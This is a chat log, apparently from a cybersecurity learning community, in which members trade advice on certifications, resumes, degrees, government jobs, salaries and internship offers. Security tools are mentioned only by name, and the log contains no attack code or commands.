cisco as in CCNA? Or some other domain?

interesting, thank you!

Yes

I never took A+ or Network+ went straight to Sec+

I learning network when I got hired for Network Admin, but I do recommend CCNA/Network+ then Sec+

I have my Sec+ and that’s it. Working on CySA+ and the. PentTest+ since the studying seems to have the same material

Why test yourself on same material several times?

Good question. I was honestly just going for Certs. After those I was gonna hit CISSP

Why not certificates of different expertise then?

I wasn't sure what to take. The big one is CISSP but I need more time to study for that

What are your goals in the field?

Nice I am skipping penttest+

going straight into CISSP and OCSP

From what I've heard, OCSP is the hardest to master so good luck!

No it is not ...

Okay. Just what I've heard @loud fern.....

👍

Ooof I have lots to learn

But CISSP is what I am prepping to get this year hopefully

I might go for CASP+

or one of the pnpt certs I been eyeing on

Good luck.

Remember that OSCP is considered to be entry level. It's tough, yes -- especially if you're coming at it without a lot of experience -- but it's far from the hardest.
TL;DR: don't listen if people try to big up how difficult it is -- chances are that stems from it being seen as the gateway cert into pentesting, rather than the actual difficulty of the exam 🙂

More to the point though, why are you specifically wanting CISSP and OSCP?

Thank you for the generous feedback @undone shore. The only reason I want to get CISSP is for the cert on the resume. I'm just breaking into the cyber career full time and need to stand out more

Gave +1 Rep to @undone shore (current: #9 - 737)

Do you know what roles you're interested in?

I have part-time experience in Cyber Analysis and System Administration. I'd like to continue on with Cyber Analysis and maybe go to Cyber Engineer

Generic titles for the most part 😄
Assuming those are largely relating to SOC analysis?

Yea pretty much lol!

Good luck Dan

My job been prepping me for CISSP, and they are willing to pay for my exam, that is if I passed lol.

So I hope i can pass

Hello all, I have 4.5 years of experience as Product Manager and then pursued masters in cyber security, currently I have no expereince and getting an interview for one looks difficult.

Kia ora everyone, I'm based in New Zealand and have just started my journey is anyone from New Zealand who can give advice as to where to go for extra training / study or can someone point me in some other directions / info that I could read to help further progress myself?

Only doing it for the sake of having the paper is quite bold, You need 5 years of experience working in cybersecurity field, ICS2 has membership fees, and you also need to maintain your certificate by collecting CPE-s every period, if you don't need it, then I wouldn't say its a certificate to go for, in fact it could work against you. If you want to do SOC analysis and you have CISSP then as a potential employer I would think. 1. You are that over-qualified why you want to do SOC, what am I missing here? 2. You have CISSP, are you going to expect salary based on that competence? Basically It would only add reasons to not hire you into SOC.

Overall, having senior-level certs or just a lot of them, without any experience, will always seem weird to an employer

Do you have any experience or background in IT or in any related capacity?

Good luck! How are your preparations going? I remembered when I first saw how many pages the AIO and Sybex books have, I thought it might take me a year or two to read either book. 😅

I have a lil been doing a lil bit of fullstack just started and want to gaiun some more skills

Any area of focus you are looking to dive into or just looking into what career options you have within cyber?

Yeah mainly looking to see what career options are there as in NZ the tech sector is a lil hard to get into but I want to get more skills to have more job security

Just dont be paper tigers guys,really..

what roles would CISSP usually determine to be contributing experience for example atm my job title is that of an IT manager but i cover alot of security aspects as well as development ones as well?

if any of 2 or more

ohh okay cool so guess it'd fall under domain 1,2,4 and 5

CISSP in Europe for example is often seen as a manager's certificate, so if you are IT manager, I'd say CISSP is justifiable for you

that would make sense, im in australia so most companies are behind in what people should be using if im honest

makes it hard to get solid information

Eh, that loss of information is everywhere

thats fair

im doing a grad cert atm which not sure if i should roll into a masters or not but i've been looking into certs to pair with it either way since seems alot of people prioritize certs when moving between companies

Well - what is your goal? If you have a certain goal then obviously following what others do might not lead to it

security architecture is where my goals sitting atm, i've got a pretty big software engineering background and done it management last 2-3 years, i'd love to end up in a ciso position eventually as well but that would be much further on

also interested in pentesting/bug bounties but more of a sidehustle

Most likely master's won't get you there, I might be wrong but often times Masters' degrees are for manager training, not so much for technical training. Technical certificates would be a good route for security architecture to go for

correct me if i'm wrong but wouldnt security architecture generally fall into that category? given nature of it

also what certs would you recommend

Yes and no, its up to companies themselves to interpret how they apply this role. I'd say its more an advanced engineer.

Depending on environment, Red Hat has something nice called RHCA for example

ohh okay thanks

Gave +1 Rep to @loud fern (current: #556 - 7)

will still eventually do masters i think but might just finished grad cert then do rest later down the line

Sure, good luck, never going to oppose anyone from learning new things

just wish the price behind it was slightly less lol

but atleast i don't pay it straight away like certs

PhD?

what area of cybersecurity are you hoping to get into?

a grad cert is something I've seen in the US, not sure about other countries but its MS level classes but not a full MS

Hey guys please I would like to know what it takes and cost to start an MISSP Firm , any suggestion would be appreciated

Experience in many areas of cybersecurity, connections, $$ is not that important, but you might need to pay for cloud service, EDR’s etc upfront

I have the experience. been hacking for years for knowledge even before all these damn certifications were coined.

as for EDR there are some opensource SEIM EDR solutions out there .

earliest cyber certifications were in the early 90s

anyway, this is probably not the right place to ask about starting a MISSP firm? which I'm guessing is related to what people call MSPs. There may be some forums on LinkedIn that could be useful

Haven't begun yet lol, unsure where to start or what books to buy 🤣

Hey y'all!

So I remembered I was helping a buddy of mine build up his cyber security company for five years. I made cold calls, set up appts, and even caught McAfee's attention as they wanted to negotiate a contract with us.

Unfortunately that small company went under after the pandemic.

I was wondering how I can use that experience to my advantage in this rough job market.

I didn't do anything technical; no pentesting or anything like that, just more administrative work. Although my buddy did educate me a lot on the technical side of IT security.

Any ideas on how I can use this on my resume? I don't want to embellish my experience, but at the same time I really need to start adding anything that can get me some attention.

So I don't work for a company that sells cyber services but many do. I would potentially call this pre-sales support. This isn't a cyber position but lots of companies that sell Cyber/IT services do use people like this

Thank you, I'm gonna try to leverage this in my favor.

Gave +1 Rep to @pseudo creek (current: #14 - 473)

security architecture is the goal for now

@pseudo creek

no need to tag me but security architecture generally focuses on various parts of cybersecurity

yeah sorry was just to link you previous thing i said

like you have to have a breadth of knowledge for technologies and security and generally you are a practitioner of cybersecurity of some sort before going into architecture

I'm a security architect but my focus is on cloud, devops, infrastructure

Are there any courses you recommend for cyber security

alot of that is around the area im wanting to head towards

well a masters really won't help with that

depends a lot on what you want to do and what country you are in, if you are just starting out, TryHackMe is a great way to learn some of the basics

would a masters help with anything outside of like ciso roles then?

it helps if you are already working in cyber and want to be a manager

I started with the Udemy cyber security course and I am getting good results. Then I have to choose which topic to work on

yeah i've had a software engineering background since 2012 and it management experience since 2-3 years ago so basically was trying to better breakthrough to security side of things since company im doing the it management for im doing everything from cloud to websites and having to make sure its all secure anyway

also did a decent amount with htb acadamy since its cheaper with education but done a few ctf's and what not

Do you have any certs? Are you doing hands on work?

i've got a bachelors in IT but havnt done any cyber specific certs, at the time figured if i did the bachelors and built up skillsetup through htb/tryhackme would be better for now since its a degree

but finding certs seems to be heavily valued

best books to learn hacking

I recommend , Kali Linux book for learning tools for hacking

question, whats the youngest one can be to actually start working in cybersecurity?

There are no legal restrictions regarding employment, depends on local laws - when can a person start working.

Would you put tryhackme study/experience onto a linkedin page and if so where abouts?

Perhaps just share you room completions, badges earned, certificates earned.

That's a good idea. I'll just share the main ones

I think its better to write what did you practice and learned during your time on THM. They dont care about badges and completed paths.

alright, thank you

Gave +1 Rep to @loud fern (current: #379 - 12)

Cybercriminals are sometimes as young as 13 years old (or less), so having an age requirement would be weird

aah i see, thank you

Guys I am looking for SOC and pentesting entry level role please anyone help

Look in your local area and apply.

Not under the experience section of linkedin, you can definitely make posts about completing paths though

That's going to depend on not only your local laws, but also the amount of risk a company is willing to take on. Persons under the age of 18 also can't sign/be held to contracts. What I am trying to say is that it would very unlikely for a company to take someone on under the age of 18, disregarding any experience requirements.

Not sure if this was a lost in translation thing, but there are definitely legal restrictions on employment set forth by labor laws. Especially if they are minors. (US point of view)

Yeah, what I meant to say was that there is no age limit past that usual working age, like to run for a president at many countries, you need to be over certain age.

If you can work legally at gas station then at same, you can legally work in cybersecurity age wise

what if they are over the age of 18 but with little experience

?

You'll need to build the experience working in other areas of the computer industry. Cybersecurity itself is not an entry level area in the grand scheme of the industry. Without a degree, a common starting point is IT Helpdesk.

hmm alright

thanks

Yeah, experience can get in the way, but employer can choose to hire you without experience, just it wont happen often

thank you, both of you

hi i wonder if anyone can point me in the right direction... i have 0 IT experience but certified in az900, sc900, comptia network+. i've been told i can start getting into cybersecurity (will be doing the security+ and CEH soon) but what jobs can i search and apply for now if any? thank you

You can apply for network technician or help desk/support.

For a no experience internship resume, should I include the projects I have done with skills in bullet points without elaboration or should I keep the projects in my portfolio link & elaborate on my skills (for example good understanding of this, familiar with this etc) ?

Working in government like:
'We will provide you with 5 SANS courses and GIAC certs"
Also government:
"No we will not cover 1 year of THM"

Take SANS over THM.

I have no choice in the matter. It's required

Not to say anything bad about THM, but SANS is not afforable by people out of their own pocket

Do you have any choice in which SANS you get or is it something determined already?

Yeah I know. Passed my GCIH today, actually.

Congratulations!

It's predetermined but later, I can request pretty much any course I want

From SANS. But not HTB or THM

If you have GCIH then you don't need THM, but I might be biased

Honestly... GCIH isn't nearly as good as the junior penetration tester path

Perhaps, I don't really have experience with their Red Team ones

So I cannot really comment much on it

But still. Its typical government logic that as soon as they have a contract, it's easier to request a 8000 dollar course from sans than a sub 1000 year subscription

For some reason I did have good impression of GCIH, mind telling me why its not as good as junior penetration tester path?

Don't know about GCIH but Jr Pentester is amazing

It's not as complete. The labs you have to go through are a walkthrough of steps instead of having to apply to knowledge to a lab

And Jr Pentester covers more, like AD, phishing and more enumeration

In THM?

Yea

Odd that they are not setting you up for Offsec courses if they want you to do red team certificates 🤔

Maybe it's just government thing

It's not offensive per se

It's general security. After this we can specialise in Blue, Red and DFIR

We get a starter course in all

Ah okay.

Which one is next?

Sec450, then it's FOR 508

Ah, I have 450, currently also working on FOR508

It can give a quite nice overview, I don't have anything bad to say about it

You do in class?

Nope, books, full self-study

Hard core man, good luck 👍

Thank you, it has worked the best so far for me

You should do some home projects,build virtual machine and play with some shit so you can write that down on your resume. They always love "personal projects" .

Personal projects are best interview material where you can fully just talk of your experience

i didn't add projects section because there are on my website

What roles are you applying to, that you aren't getting a response?

cyber security and software engineer

It seems very difficult to find a job without a reference.

I agree, networking with people plays a huge role in landing a job especially in this trying times

Do I understand correctly that every role you had in experience is 1 month long?

Given the dates, those are summer internships

Also those skills, you might want to evaluate your level in them, what do you mean by cryptography and networking?

My opinion is that your resume is not very well focused.

Make separate CVs, one for Security jobs advertisements, one for software engineer, and be more broad, but more in scope

Keep a master copy of your resume that has everything, and tailor a copy of that to each individual job you are applying to. Try to map items in the job req to specific things you've done. The skills section is probably fine, I'm not a fan of that that resume layout though.

If possible - make similar layout for skills like in experience, say what you know about this field/skill

The About Me is also pretty close to 1/3 of your actual content, condense that down. It should be the elevator pitch to get someone to listen to your elevator pitch

Mehmet bencede @flat sedge (Just in case, I said i agree with you juun) hakli, iki ayri cv cok daha mantikli. ama madem bilgisayar muhendisisin yazilim senin icin daha uygun degil mi? Estonya ya bakmani oneririm, cok ciddi ihtiyac varmis, orada gidebilirsin bile. Bende cok bildigimden degil yanlis anlama, ama dusuncelerim bunlar sen bilirsin.

English only, please. It makes it difficult to moderate chat if other languages are used

thank you guys I will do what you say

actually 3 years

i made personal projects, watching course, reading security essay etc.

but i didnt write my cv

👍 Didn't just understand the notation of writing the dates there

should i delete?

This right here sir mahmet!

Tailor your CV for every different job,dont just send same s*** to everyone.

ok sir thank you everyone

Before going into Cyber I used to work as a recruiter for the cyber security sector, if anyone wants me to take a look at their CV I would be happy to 🙂

Can you provide another screenshot of it? So we can see it all on the left

So should I put the colored part on the left side?

i am editing rn, making a CV focused on cyber security and soc

No I mean

Your picture is not centre

I can't see the left side of it

Most CVs these days go through a ATS before it reaches the HM

So the deisgn/structure of a should focus on being clear and easy to read

I don't use photos in my CV should i use

i see

i will send when it's done

No?

text only

the image you sent of your cv

columns are horrible resume formats, like Husky said, most will go through an ATS and you really don't want to risk columns messing with it. Also drop the company icons/emblems

guys, would u check again @pseudo creek @mortal quartz @loud fern @frail hound @flat sedge

Strongly recommend using a bullet list instead of prose to delineate and explain your tasks and duties in each role. Your Objectives paragraph is also written in first person, and is pretty useless to a hiring manager. You aren't really saying anything there that captures the attention. If you want to keep that, it should be an elevator pitch that sets you a part from other candidates.

You say experienced SOC analyst, what experience you mean by that? Because if I read this and then I read your work experiences, it does not add up

This looks worse then before mate. My resume is kinda similar to this one

You have free templates onlie to use,i think i used this one?

https://rocket-resume.com/resume-builder

I think is not good to use I did or I did that

quite a few things wrong with this. No picture should be on your resume. Ideally you'd want your name on the left, contact info on the right. no background as that can totally mess with ATS. A title is just wasted space. The headers are too big. Lots of wasted space for the professional experience by indenting. Of course if your resume doesn't have a lot, you can do that but... PNPT is not education, its a cert. I'm guessing the same for CWNA?

I know you said that isn't yours, just similar but just pointing out some concerns with that resume

Fair enough,but still it got me job

Is it best to include the skills with ur current level (wireshark -proficient) or just mention it without additional info ?

Offices want me to know the ERP system well, but I have never experienced it before. What advice do you have for me to understand this subject?

Hye guys. Has anyone taken the Blue Team level 1 course from the Security Blue Team? Im about to finish SOC level 1 on THM and I was thinking about jumping into that one? Have seen few companies here asking for it as a "good thing to have but not necessary". Thank you in advance

ERP systems can be quite complex, and depending on the organisation, can be highly customised to facilitate the specific way that business is oriented. An ERP is designed to allow an organisation to structure its operations around that system, combined with things like CRM, Finance, HR; to integrate and synchronise all the business's processes. Firstly, the company is reoriented to operate around the ERP, and then the ERP is customised to meet the needs of, and fully facilitate those operations. You might need specific training on that org's ERP. Is it SAP, Microsoft, Oracle, Workday, or some other one?

very constructive advice

Sure buddy

Would be nice if you could say why it looks bad 🙂

Thank you for helping. I think it is used in the networking field in the office where I did my internship. (server control etc.)

Gave +1 Rep to @rugged delta (current: #21 - 362)

Hi everyone, I've been currently working as a cybersecurity specialist for about a year now (Got the opportunity to be in the forefront at my current company) - my job entails mostly doing GRC work, but a little of incident response/SOC work as well at a small sized company and wanted to upscale my career in the field by pursing a cert towards maybe a Security Auditor, Is there any recommended certifications towards that goal? Currently studying for the security + exam. Thank you in advance for all the help!

May I ask have you got your current job with an IT background (CS degree etc.), or its totally different than that? It would be helpful for the others

i want to start free lance as bug bounty hunter , where do i start ? currently im taking Jr pen tester path on Tryhackme and an ethical hacking udemy course .

Few years in helpdesk and university degree in cybersecurity.

Has anyone taken the CISA exam before?

👍

what core skills do i need to land my first cyber security job ? im a computer engineering student and almost a graduate

currently registered cyber security course and doing try hack me rooms and self learning

There are two types of CVs when it boils down to it. A "Doer" and an "Achiever" what differentiates these two types of candidates is the choice of language in a CV. Your one right now is a "Doer", modify your language (and stop writing in the first-person) to focus on what you have achieved i.e., the end result. Rather than what you have done.

CISA is the primary cert that I'm aware of for auditors

Oh and I see you already mentioned it. I don't know anyone who has taken the CISA, just that it has a solid reputation in general

Yes that's one of the services an ERP can provide

Do you think there is a problem with having two pages?

and which one better

i like more this

For your skills instead of AWS, I would put down the specific services you have experience with

As for work experience that list I assume are internships, this could however cause issues as they may think you only lasted a month, or are a contractor, if the latter, they may be wary to why you are applying for a permy position. So I would simply title it as Internships to avoid confusion

You need to improve your English in your CV "The client provides features like"

don't use the word "like" in your CV 🙂

What position are you applying for?

I personally would refrain calling myself a SOC analyst until I have actually achieved that position

Could stick the word "Aspiring" in front.

Let the reader know what your aim is.

You have lots of emphasis on your technological knowledge, in that position I would also bring out interpersonal skills, this is not a one person job, you are expected to work in a team

I will say that anyone can put interpersonal skills on a resume, but those are really tested in an interview. I wouldn't put interpersonal skills although you could put things you've done that would reflect interpersonal skills

such as coordinating, leading, etc

Yeah don't list communication skills or interpersonal skills on your CV you demonstrate that in the interview and show it on your CV when discussing your experience

i.e., if you have experience in stakeholder engagement, mentionn that in your duties/achievements rather than listing intepersonal communication skills

well, what do you think about this question

IMO yes.

Most interviewers will spend around 30 seconds reading your resume/CV.

If that

thanks everyone

Do you think it's a cert worth pursing with about 1.5 years of experience? I don't mind GRC because of the work life balance but feel like venturing out a little. I was looking at other areas of cybersecurity and was look into a Incident responder or forensic analyst.

I think it has some work experience requirements, I thought it was 5 years but I could be wrong

You're right, I searched for it and it's 5 years minimum.

Trying to figure out how to upscale my experience to move to a better company/ position. I'm currently studying for the security + as well

It depends at what point of your career you are at

You are at the start so should be no more than 1 page

Can the certificate we received from an online course in cyber security be important in our CV?

Certificates? Not particularly. They generally don't verify that you have actually done the work yourself or confirm that you know the content to a certain standard. Certificatons fill that role.

So can we say that it does not have much effect on the CV?

exactly

Can we say that Computer Engineering is one of the university departments closest to the field of cyber security?

depends, some schools may include cyber classes in computer engineering, others would include it in computer science. Computer engineering tends to focus on hardware side while computer science would focus on software side

I am undecided between software engineering and computer engineering at the university in my city

Check both curriculums, the professors that teach there, reviews about both programs, etc.

Personally i went with computer engineering bc its hard to get hold of lab experience with microprocessors and whatnot outside of computer science and software engineering

thanks I will check

Gave +1 Rep to @dense dagger (current: #22 - 352)

Completely dependent on the curriculum and electives you've taken.

Do web devs ever beef with pentesters?

Are they ever made to feel like theyre bad at their jobs when vulnerabilites are found

Yeah i think they do feel bad

but should they?

Or is it just innevitable that something will be found

From my experience, while occassional disagreements do happen bc the dev doesn’t think its a real issue versus security’s POV, a lot of them do approve and are thankful there is security testing

It also upskills devs to be more security aware

Im assuming you work in the field?

Have you ever met a real jerk web dev?

Oh yeah definitely but its always a matter of perspective

Im about to step into the field soon. Obviously its all dependant on the team. But generally how do you find the personalities of cyber proffesionals.

Are they welcoming or a little bit up themselves.

in your experience @dense dagger

Yes that happens, they usually do this by trying to convince the pentester to change the classification of a vulnerability from critical to medium for example. Some employees lose their jobs after such audits sooo it depends on how the company treats pentests.

yo guys, where can i find other source where can i start to study cyber?

it's a big field, there aren't that many places that cover everything.

I just started recently but I don't really know where to focus

starter paths on tryhack me are a good guide to get started.

pre-security and intro to cybersecurity

Hello guys, i have a problem when play Brainstorm room. I can't run chatserver.exe for BoF attack. i use Windows 7 32bit VM for run chatserver.exe, but show error alert "This program cannot be run in DOS mode". do you have ways to solve that?

probably #room-help if it's a thm room

hello there, Im looking for advice on what certification I should pass and I can aim for,
I'm currently studying IT (Im on my 2nd year of my degree wich is a 3years degree)
I've been studying cyber for quite a moment right now so guess I know the basics from now on (basic recon using nmap,burpsuite, look for information efficently throught exploit databases, goolge searchs, using metasploit, escalate some privileges etc...)

I'm planning to get certificated at the end of the next years so what certification can I aim for ?

thanks

Gave +1 Rep to @ancient fossil (current: #1009 - 3)

hello....i need help with getting a remote job can anyone help me out?

You'll find plenty on linked in

shit😂

Any suggestions ?

for red teaming?

Net+,sec+ are good starting cert

first time being considered for a position in cybsec and was sent to take a reasoning (matrigma) assessment. Is this often encountered in the hiring process of this field?

Oh yeah, I just got done with one a few days ago

It might be due to what position you're applying to also

Most entry-level have those type of assessments and those are from HR first before the actual technical assessments

Thank you for the info! I was confused and thought it was a bit useless so I wasn't sure if it's common in this field or not

Thanks I'll look them up, was thinking about passing pentest +

Gave +1 Rep to @violet pumice (current: #380 - 12)

Has anyone taken Sec+ I’m just trying to figure out what to expect to hammer those study points hard so I can pass first go, any input is welcome thanks in advance😁

Feel free to DM if you have any specific questions 🙂

im currently wondering which education to choose first between security tester and security specialist

does anyone know the core differences?

where are you getting this education from?

i know tester is more like a pentester and ethical hacker but what does a specialist do?

its a school in sweden

.

do you have details ? I mean every school can call whatever it wants something but a curriculum would give you a better idea than a title

basically what they said was penterster is the type of hackers that try to hack systems and find problems and it security specialist was resposible for setting up systems in the networks etc

ok so they gave you no curriculum? just generics? its hard to tell, but I'd choose based on what interests you the most

Im pretty intersted in crypto and blockchain development and the entire crypto space, do you think this could affect my choice of career between these two choices in any way?

neither of those have anything to do with that

I know, but maybe one of them is better suited for someone living a crypto lifestyle

?

No

Cryptography lifestyle, maybe. 😄

Is there any progress?

Hey everyone, I'm currently working as an operations analyst (not security related but its my first job in IT and I'm getting some great foundations in network and systems administration). I have a goal to become a penetration tester but I wanted to reach out and get thoughts: How useful or practical is blue teaming, like SOC Analyst or Engineering experience, before pivoting to a pentesting role? Do we feel its worth it or should I just focus on red-team stuff? All thoughts and ideas are well appreciated, hope all is well everyone!

Give me a bit of time and I will review it

so in terms of masters is it just ciso roles which it would really be applicable to?

or would there be other roles as well

mostly asking since a masters is just an additional year compared to grad cert/diploma so trying to work out where the value of having it would sit

masters are mostly for management once you get into cybersecurity

the primary issue with masters is if you don't have real world work experience, it has the chance of hurting you

i've got a bit of experience its just more around it management rather then a purely cyber role but i've had to cover some security aspects as well

im more or less just trying to workout what parts of management it would help with

well if your goal is management, its not bad especially since you already have experience

since its only a year longer then grad cert which im half way through

originally i was going to aim towards security architecture but im happy to rearrange things i'm just trying to workout essentially what level of management it gets consider as almost a requirement

or if its just a nice to have

its a nice to have

alright that makes more sense

i was almost not gonna go all the way through but i thought about it and figured it would only be a year extra and its better well known expecially when dealing with non technical people

thanks, you've given me clairfication in where it sits

Gave +1 Rep to @pseudo creek (current: #14 - 474)

Is there any government jobs in cyber security field

Depends where you live, I'm employed in one.

So am I. Governments have a hard time competing where I live so you usually get generous benefits besides pay

Especially in regards to training and education.

did you reviewed

Yes

Which type of exam didi you give to get the job

Or is there any exams from we can get the government job

Usually for goverment jobs you need college education plus years of experience.

Okay

This is going to be dependent on which government you're looking to work for. Using the US DOD space as an example, a degree of some kind is pretty much mandatory and then specific jobs will have different certification requirements. You can't go wrong with Security+. I will say, if you're a foreign national trying to get work in that space, good luck.

hi

Wdym years of experience

What type of experience are they wanting

IMO, it's a little broad of a statement, but all Federal Government (US) positions are posted on USA Jobs with their respective requirements.

I see

Other countries have their own way of doing things

Wait so how are they considered entry level if there are requirements

Some considered entry level

Or that just a term they throw around?

I don't think entry was specified in the conversation? However, all requirements for roles are listed on the posting. Again, this is US specific.

Oh yeah entry wasn’t specified sorry

Last year we had some job opening in my country,something similar to DoD/FBI and they wanted 5 of years college + at least 8 years of experience in cybersecurity.

But sure it depends on country.

govt. never pays what that level of experience is worth.

The state hires anyone who has political acquaintances

It really depends, Gov is likely going to be slightly lower than private on raw salary. You have the base GS scale, which gets modified depending on your location. The base itself not very good, it's low for cities, but with the location mod it gets more reasonable. However, not all government jobs use the GS scale, there are separate scales that are more in line with what private companies pay. You typically see them more around systems engineering roles. The main driver for government though is the benefits and stability.

This is for US

I went in off of my degree with no experience, getting over 100k. They asked for evidence of various skills but that was it.

that's good information. much appreciated

Yeah, pretty much the same thing. I didn't make 100k out if school though. Got a call, felt like I tanked the interview, got hired, and now I'm moving on. Solidly in six figures now.

Also for clarification, where I am. The 100k is about average for private, however the good private pay more. We just have a lot of bad private companies that pay average.

I'm in the DMV, but I also don't think if a company pays the average for the area they are a bad private company. It's the average for a reason. I would moreso apply the bad label to companies that knowingly underpay their employees.

which, honestly, is usually dependent on the manager trying to hire for value and the candidate not knowing what to negotiate for

If you are from USA,100k is not special for someone with "good" skills.

I am not, and this is an entry level government position for cyber. Like I said, no experience.

Oh then sounds cool,congrats.

When did u graduate ? (if u dont mind me askin)

USA is crazy for tech jobs with 100k right out of school. In Germany you're very lucky if you get 70k+ with a masters degree in cyber security (achievable in the finance sector).

~50k is a realistic expectation for a bachelor in the cybersecurity sector.

Try with Poland, where 50k would be a dream for some senior engineers lol

Then again, we got lower cost of living and better workers rights. Much harder to be suddenly let go with a 2 weeks notice in Germany because the company did a financial oopsie.

Yeah the pay gap even between european countries is crazy

Yeaaah and the cost of living isn’t that different :/

I read a news article recently about average income in Germany and it also listed the average buying power of citizens of different european countries. Buying power I think is money after taxes.

Anyway Germany was #9 with ~26.3k and Poland was #28 with ~11.9k. Ukraine was at the bottom with 2.5k. Switzerland had ~49.5k 💀.

I'm changing careers and haven't looked for a job in awhile. Is it common to get a remote job by only submitting a behavioral/technical questionnaire?

I think it also applies to regions in the same country ? I mean there's Berlin and there's Munchen

I got hired with an applicable uni bachelor's, no previous IT experience and the government organisation I work for is giving me time and opportunity to train into a technical field. We very much have junior positions in literally all fields

The pay gap between the new and the old federal states is notable, but it's not as crazy as poland vs germany for example, or germany vs US.

Even the intelligence agencies hire 'junior hackers' that require little actual experience. Just certs and skills

Unlikely that it's a single stage process, usually you have a (video)call for getting to know you, general stuff then a technical test if it's needed (you might be very convincing) and then the offering

depends on a lot of things, mostly being able to position yourself (knowledge level) in a world context. Also it's about flexibility (reloacate)

when I was looking at jobs in DE, roughly same role was 80-90k in Munich and 60-65k in Berlin

Fair enough

but also the rent is double 😄

that's why I find the 'salary' discussions a bit useless, context matters .. is it a 50k remote role where I can live with 5$ at my grandparent's country house or 100k in the middle of XX where rent is 1500$/mo

Yup, if you wanna live in Munich, Berlin or inner city Frankfurt you better get ready to sell some of your organs.

Im not German but i feel that struggle deeply

My honest plan is to just get a remote job in a big, well-paying city and then live somewhere on the outskirts of a moderately sized city. Urbanized enough to get everything I need, cheap enough to live comfy and calm enough that I don't lose my marbles.

We have people here who work in southern\eastern cities in the NL and then go and live just across the border in Germany or Belgium

Oh yeah, NL got higher cost of living but similar wages afaik.

Yes. Personally I can't complain because of all kinds of reasons my salary had a 50% increase in 2 years but especially the housing market is royally fucked rn

The dream would of course be to live in Germany but work in Switzerland, but that has its own complications (plus a lot of competition from other Germans wanting the higher wages and better taxes).

For now though, I am just thinking about the immediate future. Gotta get some experience in and then I can try crazy / greedy strats :)

isn't it the case that you pay the income taxes in the country where you live more than 6mo/year? like your tax residence

Yeah fair, you'd have to live in Switzerland for most of the year probably. Pretty sure there are legal ways to have your cake and eat it too, but they are effort.

who know the kali linix hacking

wut?

define "Kali linux hacking"

Guys what is the best way to monetize my hacking skills (from Home)?
Like a few people said that BugBounty/BugHunting is the best way to do it, but are there another options?

doing vr

find bugs in important software and report them

very few people are good at binary exploitation so if you're in the 1% who is good at it it can be very lucrative

hey guys i got my junior pen test certificate 3 days ago. 5 months ago i didn't even know linux was to scared to even try linux. and then one of my friends said i must try it and i got hooked couldn't stop still can't. and from linux i went to cyber security. im from south africa and i don't think we have a lot of hackers well i hope not lol and i know there is a lot more people on this group that is far more better than me so skilled but the question i have is about tryhackme. now don't get me wrong tryhackme is very nice and ive' learned a lot but am i learning the right programs compare to a real hacker? example metasploit vs https://bruteratel.com/ and netcat reverse shell no hacker will ever use it because his ip will show up. even google tells you that i know you learn the foundation but with todays tech shouldn't we be learning what real hackers are learning how am i suppose to to check a company and give my word that everything is fine if i know its not. todays hackers aren't in their 30's their 10 ,13, 16 years old . i might be wrong but just how i see it thanks

Congratulations on earning your junior pen test certificate! It's inspiring to see how quickly you've progressed from being unfamiliar with Linux to diving into cybersecurity. Respect!
While platforms like TryHackMe are great for learning, supplement your knowledge with real-world experience and stay updated on industry trends.

So its a experience thing sometimes

thank you

Hello, I took a cyber security course 2-3 months ago and entered this field that I love. I couldn't use sites like TryHackme much, but the information the Udemy course gave me was very valuable. I think you should start a course and learn the basic functions.

Metasploit is often used by both white and black hat hackers sooo this knowledge isn’t worthless

Most of the stuff you learn here can be used in real life when you’re testing real companies

absolutely, it is always necessary to look for and check for vulnerabilities

thanks will check it out

Gave +1 Rep to @warm furnace (current: #2030 - 1)

thanks

will do

just because there's newer methods, doesn't mean the old ones don't work if a company overlooks them etc

noted thank you

thanks for the advice appreciate it

Hi guys I would like to ask you for some advice, I have a master's degree in data science so I am not new to the IT field but apart from some general knowledge through tryhackme now two years ago I know very little and I would like to take some imoprtant certification in pentesting. Do you have any advice on this? What certification would you recommend in this area to have the opportunity to make a career path change from data science to cybersecurity? Or even better do you know if exists a field that mix these two?

OSCP is the standard certification for new pentesters and most commonly recognized one

Only cybersecurity field I can think of that could be related to data science due to its properties is Threat Intelligence, but don't take my word on it, there are a lot more people more qualified than me to comment on that.

thank you Rannet!

Enrolled in what, exactly?

Hi everyone, I'd like some input into a security internship decision. I need to decide by tonight/tomorrow morning and I'm having a hard time gauging which position would be better for my career in the long run. I have 2 offers: Microsoft Security Research intern, and NVIDIA Info Sec Analyst intern. In the long term, I see myself working in security engineering or DevSecOps.

Can I get some input into which internship would lend me the best experience to align with those long-term goals?

with an internship, I wouldn't sweat it too much, did they each offer some details on what you would be doing?

NVIDIA did, as an infosec analyst intern I'd be automating some of their manual GRC tasks and meeting with customers about NVIDIA security measures. MSFT didn't give much insight into the security research internship because they said the project is dependent on the intern's abilities, so they don't decide until the intern has accepted, but the role is very much technical. To me, it sounds like NVIDIA aligns more with security engineering, but the role is not technical, so they already told me that I'd be building things because I come from a SWE background and can build things, not because the job requires it.

personally, I'd go with Microsoft, but like I said, neither would be a bad thing

Thank you for the advice, i really appreciate the input

Gave +1 Rep to @pseudo creek (current: #14 - 475)

It's an internship, don't stress about which is better for your career long term. Both are going to be good for you, pick whichever one you think supports your career goals better.

hpwd u land these

what was the interview processlike?

applied to 91 security internships lmfao 😭 For MSFT it was 3 45-minute interviews in a row with security researchers (all technical but only one LC easy coding challenge, the rest were technical security questions). For NVIDIA it was 2 30-minute interviews a few days apart, with a current infosec analyst and the hiring manager (no coding challenge since it is nontechnical position, a few technical security questions and mostly behavioral). I heard back from Microsoft a few months after applying, and heard back from NVIDIA within 1 month of applying.

Good job though. congratulations.

Well done on getting both of these opportunities. whichever you choose will certainly benefit your career

I Just started tryhackme and wanted to know if it would be possible for me to get a job just from this or if i need more experience

Need experience

Definitely helps tho doing these rooms

TryHackMe is a good way to supplement personal learning, but if you want to work in security you're going to need some prior professional experience or a degree.

You can read some of these success stories from people who used Try Hack Me to grow their skills and get a job and the full path they took
https://tryhackme.com/r/resources/success-story

As I said before, just the fact that I was doing tryhackme and getting in some progress showed 'cyber affinity' to my current employer and that was enough to get me accepted to the position. That being said, it was an internal application (still a formal process) and they expect me to develop myself towards a technical position

Thank you bro

Gave +1 Rep to @stoic cave (current: #20 - 380)

Alr Thank You

thats good im gonna try do the same how long did it take you personally to learn everything you needed for the job

3 months

But really, i am probably a fringe case. Be ware that:
*I work in government who are infinitely more patient with junior employees
*My employer is more than willing to provide me with time and training to get better. I do not make money for a company, I work for the government, so there is no money rush or crunch
*My background in previous jobs was sought after for the position I applied to. Yes it's a cyber job, which you could put in the 'governance' section, but my previous experience was what makes me valuable for this role, and only this role

